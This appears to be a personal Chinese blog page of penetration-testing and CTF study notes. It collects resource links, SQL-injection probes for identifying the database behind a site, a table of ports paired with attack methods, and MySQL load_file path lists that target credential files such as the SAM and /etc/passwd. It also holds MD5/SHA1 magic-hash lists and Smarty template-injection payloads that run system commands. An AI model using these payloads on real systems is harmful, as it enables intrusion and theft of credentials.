日常发布资源的地方

日常座右铭

即使再小的帆也能远航。
只要学不死,就往死里学!


真正的明白:知道老师要告诉我们什么,学完后能做什么事情

认认大神老师

B站狂神


目录

信息收集

网站DNS记录查询

靶场

docker搭建dvwa

上述搭建完成靶场后,使用下面语句运行即可
docker run -d -p 81:80 d9c

杂记

图标库==Win镜像下载==免费音乐站点推荐==PIP换源

Hack

红队兵工厂/武器库
棱角社区
渗透测试各个计算机系统的命令
渗透测试常用术语
ATTC&CK-专业名词阐释
反弹shell生成
查出对应域名相关的IP及地址
端口协议安全
fofa语法

源码收集-灰

https://www.huzhan.com/
https://28xin.com/
https://bbs.bcb5.com/
https://www.shixinwl.com/
https://www.lengcat.com/
https://www.xlymz.com/
https://www.ymadx.com/

黑暗引擎:

https://fofa.so
https://quake.360.cn
https://www.shodan.io
https://www.zoomeye.org

自动项目:

https://github.com/knownsec/Kunyu
https://github.com/0x727/ShuiZe_0x727
https://github.com/TophantTechnology/ARL

相关资源:

https://forum.ywhack.com/center.php

解密相关资源

https://www.cmd5.com
http://tmxk.org/jother
http://www.jsfuck.com
http://www.hiencode.com
http://tool.chacuo.net/cryptaes
https://utf-8.jp/public/aaencode.html
https://github.com/guyoung/CaptfEncoder

密码学

CTF密码学常见加密解密总结
CTF中常见密码题解密网站总结(建议收藏)
JS方括号括号特殊字符加密解密
CTF在线工具
md5加密解密工具
各种各样的加密解密工具
颜文字加密解密1颜文字加密解密2
30余种加密编码类型的密文特征分析(建议收藏)

Web安全

B站大佬解OSCP

信息收集

DNS域名解析
超级ping网站:获取最近的CDN节点。
各地ping—-国外ping国外获取真实IP地址的站点(不一定正确)全网扫描
本机IP地址查询以及出网IP地址查询旁注查询IP地址反查
TCPdump-抓包相关
常见端口渗透端口渗透测试总结
看图识WAF
绕过CDN总结绕过CDN方法2
免费IP代理池
万能密码大全
sqlmap用户手册

转自:https://www.jianshu.com/p/995f57e36918
SQL注入之注入点判断数据库类型
0x01:MSSQL
ID=1and(selectcount(*)fromsysobjects)>0返回正常
ID=1and(selectcount(*)frommsysobjects)>0返回异常
ID=1andleft(version(),1)=5%23//红色字体也可能是4
ID=1andexists(selectidfromsysobjects)
ID=1andlength(user)>0
ID=1CHAR(97) +CHAR(110) +CHAR(100) +CHAR(32) +CHAR(49) +CHAR(61) +CHAR(49)

0x02:ACCESS
ID=1and(selectcount(*)fromsysobjects)>0返回异常
ID=1and(selectcount(*)frommsysobjects)>0返回异常

0x03:MYSQL
id=2andversion()>0返回正常
id=2andlength(user())>0
id=2CHAR(97,110,100,32,49,61,49)

0x04:ORACLE
ID=1and'1'||'1'='11
ID=1and0<>(selectcount(*)fromdual)
ID=1CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)

0x05:其他方法
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
“--”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。

常见端口和服务

端口 说明 攻击方法
21 FTP-文件传输协议 弱口令、爆破、嗅探、后门
22 ssh-安全隧道远程登陆 弱口令、爆破
23 telnet-远程连接 弱口令、爆破、嗅探
25 smtp-简单邮件传输协议 邮件伪造
53 domain-DNS域名解析服务 DNS劫持、缓存投毒
80/443 http服务 常见Web漏洞、IIS写文件、OpenSSL
139 Samba服务 爆破、远程代码执行
445 局域网共享 ms-17010漏洞(Win7及之前版本)
873 Rsync 远程代码执行
1433 MSSQL数据库 爆破、SQL注入
2049 NFS 未授权访问
3306 MySQL数据库 爆破、SQL注入
3389 rdp-远程桌面连接 爆破、漏洞ms12-020等
5432 postgresql 爆破、注入
5632 Pcanywhere 拒绝服务等漏洞、爆破
5900 VNC远程登陆 爆破、认证绕过
6379 Redis 未授权访问
7001/7002 weblogic Java反序列化漏洞
9990 jboss 远程代码执行、Java反序列化

代码审计

红日安全-PHP
数据库load_file()读取操作
突破secure-file-priv写shell
SQL注入

load_file 常用路径信息(套用他人博客的)

WINDOWS下:
c:/boot.ini //查看系统版本
c:/windows/php.ini //php配置信息
c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆 密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看 WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX 下:

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略

load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

工具

Masscan:端口扫描,应用协议
Wafw00f:Web应用防护防火墙识别
Nmap:端口扫描,应用协议,防火墙识别
搭建XSS平台
搭建XSS平台的方法2

指纹识别

云悉指纹识别
CMS中间件指纹识别库

漏洞

flash框架漏洞
XSS跨站脚本攻击
Referer漏洞攻击汇总
渗透测试之中间件安全
Linux关机:poweroff

字典

md5为0e开头的小字典如下
具体看这篇博客
简单来说就是哈希值为0

md5加密明文获得0e开头密文&md5弱类型对比绕过

弱类型比较,注意了。

明文
密文
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

sha1加密明文获得0e开头密文

aaroZmOk
0e66507019969427134894567494305185566735
aaK1STfY
0e76658526655756207688271159624026011393
aaO8zKZF
0e89257456677279068558073954252716165668
aa3OFF9m
0e36977786278517984959260394024281014729
0e1290633704
0e19985187802402577070739524195726831799
10932435112
0e07766915004133176347055865026311692244

模板注入

smarty模板注入漏洞

常用payload
{if phpinfo()}{/if}
{if passthru("cat /flag")}{/if}
{if system('ls')}{/if}
{if readfile('/flag')}{/if}
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if}
smarty中的{if}标签中可以执行php语句

模板注入漏洞汇总-博客


评论
avatar
矢幽武
生灵造物,百力奋心
机遇自争,各凭本事
没有攻不破的系统 ,
只有不努力的黑客
Follow Me
公告
, 不败的 信条, , 鸿 --孤志

mao

微信号:无

QQ:无

--------------------------------

每日更新指南:

刷题/记录总知识一般会沿用上次的文档

学习新知将新开文档